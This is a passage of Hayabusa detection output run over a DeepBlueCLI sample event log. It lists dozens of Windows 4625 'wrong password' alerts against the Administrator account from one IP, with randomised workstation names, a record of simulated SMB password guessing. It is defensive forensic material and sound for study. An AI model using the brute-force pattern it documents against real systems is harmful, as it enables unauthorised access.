NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urHCDmdCfNexxUHf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czGXZFukLquA9Mce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: icWMY9pKCQMyTxJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v28FLC2WXEXSUiI5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FwhjHww5iA51SFjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 96BwmhKqDIojhdRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DiRvofjwoeAdHYrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNLdOrPwbvYELiCc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x15WKTspmg2ALHaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QMoQWddkcYtCmoKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jhTbfX42Pwn7OA2k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXcbUCgAhVFfqLc3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GHyXVM0jpaKBiY9N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TZoWEcU6VbEnrLpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LIfEzNQWwvrai4ga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DhImfqWz7SHId9hE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6sekQfneNE5uFtx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iEQ6KkZEHGcSgdA8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qzxJYBbM7ZMaaGOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wO5GFBqSltNfjtQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PdsMzjfP1ZcPju2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LqpKmoCX9slPXie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ouHvw1LXTN3OSFYb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tZIB1QO7hfugceJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4QU2BQ0u5tJsdjG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0P7NKiKCmLvu6L1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4obkK4RfsLZe5gdi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRUDpDLhgop8d1el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LvdsNkFqfFWRePXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wvd8c1jYrEZMcKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AWvECxgkvWdg9Zdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHHPOAYSMSp3BhX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rJicXUMfrx9BOzHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eybrQWvrvwSkNADJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VVMPCaQB0XteDSwC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lbjjLoATZE6KPIQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tips954DRcYeIB2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nLe9aMiMz0akxfWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: csroGB9KZOZkb5sY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Zl4Rc25RsvJ7Y9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5CxqCFOIJBMZCD6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gVPwxpR05F3B5aXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nP317UkK2DhTD5Rd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ir3c7dqXm1LhbfqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1U1QZiJSrEufxF3b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HZnDnDhTPuC9n5A1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72gY1ClzwuisAhKW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nrneLGOZCwPIeQgT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm3gGV2yR4B3yrJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fzeklLG1KCTE5FpP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZPwxCw3EWy9NShk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MalB3OcsOsRaMtS3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XMZMqCYPHO3n4RIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1VUeIuU1rQPISNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: md4ioB8wNiaz2EKB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nM8QaFeqwDfJZ1gc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlR75rMhpLnfQZbC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8BcOe4YUDYTXkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FK0Iiao20PyPmtTk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kQbCbAHrQilFmMZP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VUdXQOw98VVoksDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fISqpC8eKlaQGabv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s5Y0VryMAHjtB3n2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsjAHlztFIC8tBt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiEQlAlTOhqOKpmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i7lUqZMROQXNUtQm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0eFCGEtOLzjUxI5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CqfOAGcVcwSgaeo3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hcqVJzkVgvUnebk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9ZpqiTGXqJlAQTZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qCzXKlJ2vPeqqdfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tITW0ihpErFk3nKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MdQqr1T4frPNlulf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: niiXRpP5AVHpG9Hu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EThR98jZUdwNxbXQ : IP Address: 192.168.198.149 : AuthPackage: 